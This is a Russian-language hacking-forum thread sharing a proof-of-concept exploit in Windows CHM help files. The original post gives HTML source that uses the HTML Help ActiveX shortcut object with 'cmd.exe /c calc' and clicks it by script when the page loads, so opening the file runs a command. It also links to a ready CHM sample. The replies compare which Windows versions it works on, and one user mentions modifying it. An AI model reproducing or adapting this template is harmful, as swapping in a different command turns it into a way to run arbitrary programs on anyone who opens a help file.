Local уязвимость CHM

[Exmanoize]

Локальная уязвимость в файле справки CHM, запуск исполняемых файлов.
Возможно уже устранена в последних апдейтах винды, возможно нет.
Работает на всех виндах.
Сорс:

Спойлер: 30

<HTML DIR="LTR">
<BODY>
Exma Group

<OBJECT id=a classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",cmd.exe,/c calc ,">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<script>
a.Click();
</SCRIPT>
</BODY>
</HTML>

пример CHM файла, запуск калькулятора:

Спойлер: 30

http://www.sendspace.com/file/2o7khe

 

[karabas-barabas]

у мну винда с последними обновами вроде - не запустился calc

 

[Exmanoize]

ну значит в апдейтах последних уже пофикшено)

 

[AHTOLLlKA]

на семерке все запускает...
я уже модифицировал его только найти не могу((

 

[darkstorm3535]

This is Not Work On Windows 7

 

[TrueUser]

Локальная уязвимость в файле справки CHM

на семерке все запускает...

Насколько я знаю вин 7 не поддерживает старые файлы справки без докачки дополнительной софтинки.

 

[DASM32]

Этот PoC нормально на 7ке запустился(знакомому дал на проверку), как и на XP

 

[Exmanoize]

Насколько я знаю вин 7 не поддерживает старые файлы справки без докачки дополнительной софтинки.

возможно под файлами справки ты имел ввиду HLP ?)
если так то да, они под 7кой и вистой в новой модификации. А уязвимость под HLP только на <=XP
CHM же работает в висте точно, в 7ке тоже должно)

 

[py4ka]

Сработало на XP, Vista, Win7. Но на висту и семёрку предварительно был установлен HTML Help с сайта мелкомягких

 

[AHTOLLlKA]

у меня вообще чистая семерка... без всяких дополнений всего лиш с апдейтами)